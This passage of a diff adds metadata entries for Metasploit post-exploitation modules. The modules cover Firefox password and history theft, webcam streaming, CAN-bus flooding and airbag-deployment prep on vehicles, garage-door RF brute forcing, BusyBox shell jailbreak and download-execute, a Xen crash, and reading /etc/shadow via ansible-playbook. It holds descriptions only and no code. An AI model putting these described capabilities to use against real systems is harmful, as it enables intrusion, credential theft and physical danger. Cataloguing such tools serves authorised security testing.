+ "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/history": { + "name": "Firefox Gather History from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/history", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-11", + "type": "post", + "author": [ + 
"joev " + ], + "description": "This module allows collection of the entire browser history from a Firefox\n Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/history.rb", + "is_install_path": true, + "ref_name": "firefox/gather/history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/passwords": { + "name": "Firefox Gather Passwords from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/passwords", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-11", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows collection of passwords from a Firefox Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/passwords.rb", + "is_install_path": true, + "ref_name": "firefox/gather/passwords", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/xss": { + "name": "Firefox XSS", + "fullname": "post/firefox/gather/xss", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. 
It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.", + "references": [], + "platform": "Firefox", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/firefox/gather/xss.rb", + "is_install_path": true, + "ref_name": "firefox/gather/xss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/manage/webcam_chat": { + "name": "Firefox Webcam Chat on Privileged JavaScript Shell", + "fullname": "post/firefox/manage/webcam_chat", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-13", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows streaming a webcam from a privileged Firefox JavaScript shell.", + "references": [ + "URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 12:21:55 +0000", + "path": "/modules/post/firefox/manage/webcam_chat.rb", + "is_install_path": true, + "ref_name": "firefox/manage/webcam_chat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/can_flood": { + "name": "CAN Flood", + "fullname": "post/hardware/automotive/can_flood", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Pietro Biondi" + ], + "description": 
"This module floods a CAN interface with supplied frames.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/can_flood.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/can_flood", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/canprobe": { + "name": "Module to Probe Different Data Points in a CAN Packet", + "fullname": "post/hardware/automotive/canprobe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). 
Does not check for responses and is\n basically a simple blind fuzzer.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/canprobe.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/canprobe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/diagnostic_state": { + "name": "Diagnostic State", + "fullname": "post/hardware/automotive/diagnostic_state", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/diagnostic_state.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/diagnostic_state", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/ecu_hard_reset": { + "name": "ECU Hard Reset", + "fullname": "post/hardware/automotive/ecu_hard_reset", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module performs hard reset in the ECU Reset Service 
Identifier (0x11).", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/ecu_hard_reset.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/ecu_hard_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/getvinfo": { + "name": "Get the Vehicle Information Such as the VIN from the Target Module", + "fullname": "post/hardware/automotive/getvinfo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "This module queries DTCs, some common engine info, and vehicle information.\n\n It returns such things as engine speed, coolant temp, Diagnostic Trouble\n Codes, as well as all info stored by Mode $09 Vehicle Info, VIN, etc.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/getvinfo.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/getvinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/identifymodules": { + "name": "Scan CAN Bus for Diagnostic Modules", + "fullname": "post/hardware/automotive/identifymodules", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + 
"author": [ + "Craig Smith" + ], + "description": "Scan the CAN bus for any modules that can respond to UDS DSC queries.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/identifymodules.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/identifymodules", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/malibu_overheat": { + "name": "Sample Module to Flood Temp Gauge on 2006 Malibu", + "fullname": "post/hardware/automotive/malibu_overheat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Simple sample temp flood for the 2006 Malibu.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/malibu_overheat.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/malibu_overheat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/mazda_ic_mover": { + "name": "Mazda 2 Instrument Cluster Accelorometer Mover", + "fullname": "post/hardware/automotive/mazda_ic_mover", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module 
moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/mazda_ic_mover.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/mazda_ic_mover", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/pdt": { + "name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)", + "fullname": "post/hardware/automotive/pdt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Johannes Braun", + "Juergen Duerrwang", + "Craig Smith" + ], + "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. 
(ISO 26021)", + "references": [ + "CVE-2017-14937", + "URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/pdt.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/pdt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/rftransceiver/rfpwnon": { + "name": "Brute Force AM/OOK (ie: Garage Doors)", + "fullname": "post/hardware/rftransceiver/rfpwnon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Corey Harding", + "Craig Smith" + ], + "description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. 
This is a port of the rfpwnon tool by Corey Harding.", + "references": [ + "URL-https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", + "is_install_path": true, + "ref_name": "hardware/rftransceiver/rfpwnon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/rftransceiver/transmitter": { + "name": "RF Transceiver Transmitter", + "fullname": "post/hardware/rftransceiver/transmitter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.", + "references": [ + "URL-https://github.com/AndrewMohawk/RfCatHelpers" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/rftransceiver/transmitter.rb", + "is_install_path": true, + "ref_name": "hardware/rftransceiver/transmitter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_hardware/zigbee/zstumbler": { + "name": "Sends Beacons to Scan for Active ZigBee Networks", + "fullname": "post/hardware/zigbee/zstumbler", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Send beacon signals to the broadcast address while channel hopping.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 20:12:59 +0000", + "path": "/modules/post/hardware/zigbee/zstumbler.rb", + "is_install_path": true, + "ref_name": "hardware/zigbee/zstumbler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/enum_connections": { + "name": "BusyBox Enumerate Connections", + "fullname": "post/linux/busybox/enum_connections", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. 
It will\n enumerate the connections established with the router or device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/enum_connections.rb", + "is_install_path": true, + "ref_name": "linux/busybox/enum_connections", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/enum_hosts": { + "name": "BusyBox Enumerate Host Names", + "fullname": "post/linux/busybox/enum_hosts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/enum_hosts.rb", + "is_install_path": true, + "ref_name": "linux/busybox/enum_hosts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/jailbreak": { + "name": "BusyBox Jailbreak ", + "fullname": "post/linux/busybox/jailbreak", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). 
It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/jailbreak.rb", + "is_install_path": true, + "ref_name": "linux/busybox/jailbreak", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/ping_net": { + "name": "BusyBox Ping Network Enumeration", + "fullname": "post/linux/busybox/ping_net", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/ping_net.rb", + "is_install_path": true, + "ref_name": "linux/busybox/ping_net", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/set_dmz": { + "name": "BusyBox DMZ Configuration", + "fullname": "post/linux/busybox/set_dmz", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. 
It allows to manage\n traffic forwarding to a target host through the BusyBox device.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/set_dmz.rb", + "is_install_path": true, + "ref_name": "linux/busybox/set_dmz", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/set_dns": { + "name": "BusyBox DNS Configuration", + "fullname": "post/linux/busybox/set_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/set_dns.rb", + "is_install_path": true, + "ref_name": "linux/busybox/set_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/smb_share_root": { + "name": "BusyBox SMB Sharing", + "fullname": "post/linux/busybox/smb_share_root", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. 
It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/smb_share_root.rb", + "is_install_path": true, + "ref_name": "linux/busybox/smb_share_root", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/wget_exec": { + "name": "BusyBox Download and Execute", + "fullname": "post/linux/busybox/wget_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/wget_exec.rb", + "is_install_path": true, + "ref_name": "linux/busybox/wget_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/dos/xen_420_dos": { + "name": "Linux DoS Xen 4.2.0 2012-5525", + "fullname": "post/linux/dos/xen_420_dos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Christoph Sendner ", + "Aleksandar Milenkoski " + ], + "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. 
Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.", + "references": [ + "CVE-2012-5525" + ], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/dos/xen_420_dos.rb", + "is_install_path": true, + "ref_name": "linux/dos/xen_420_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ansible": { + "name": "Ansible Config Gather", + "fullname": "post/linux/gather/ansible", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module will grab ansible information including hosts, ping status, and the configuration file.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/ansible.rb", + "is_install_path": true, + "ref_name": "linux/gather/ansible", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ansible_playbook_error_message_file_reader": { + "name": "Ansible Playbook Error Message File Reader", + "fullname": "post/linux/gather/ansible_playbook_error_message_file_reader", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "rioasmara" + ], + "description": "This module will read the first line of a file based on an 
error message from ansible-playbook with sudo privileges.\n ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line\n where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read\n /etc/shadow to obtain root's hash.", + "references": [ + "URL-https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb", + "is_install_path": true, + "ref_name": "linux/gather/ansible_playbook_error_message_file_reader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/apache_nifi_credentials": { + "name": "Apache NiFi Credentials Gather", + "fullname": "post/linux/gather/apache_nifi_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "Topaco" + ], + "description": "This module will grab Apache NiFi credentials from various files on Linux.", + "references": [ + "URL-https://stackoverflow.com/questions/77391210/python-vs-ruby-aes-pbkdf2", + "URL-https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#nifi_sensitive_props_key" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/apache_nifi_credentials.rb", + "is_install_path": true, + "ref_name": "linux/gather/apache_nifi_credentials", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/checkcontainer": { + "name": "Linux Gather Container Detection", + "fullname": "post/linux/gather/checkcontainer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "James Otten " + ], + "description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, WSL, LXC, Podman and systemd nspawn.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-04-26 21:58:43 +0000", + "path": "/modules/post/linux/gather/checkcontainer.rb", + "is_install_path": true, + "ref_name": "linux/gather/checkcontainer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/checkvm": { + "name": "Linux Gather Virtual Environment Detection", + "fullname": "post/linux/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n Bhyve and QEMU/KVM.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "linux/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ecryptfs_creds": { + "name": "Gather eCryptfs Metadata", + "fullname": "post/linux/gather/ecryptfs_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Dhiru Kholia " + ], + "description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. 
Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/ecryptfs_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/ecryptfs_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_commands": { + "name": "Gather Available Shell Commands", + "fullname": "post/linux/gather/enum_commands", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will check which shell commands are available on a system.\"", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-12-20 23:42:51 +0000", + "path": "/modules/post/linux/gather/enum_commands.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_commands", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_configs": { + "name": "Linux Gather Configurations", + "fullname": "post/linux/gather/enum_configs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module collects configuration files found on commonly installed\n applications and services, 
such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_configs.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_configs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_containers": { + "name": "Linux Container Enumeration", + "fullname": "post/linux/gather/enum_containers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "stealthcopter" + ], + "description": "This module attempts to enumerate containers on the target machine and optionally run a command on each active container found.\n Currently it supports Docker, LXC and RKT.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/linux/gather/enum_containers.rb", + "is_install_path": true, + "ref_name": 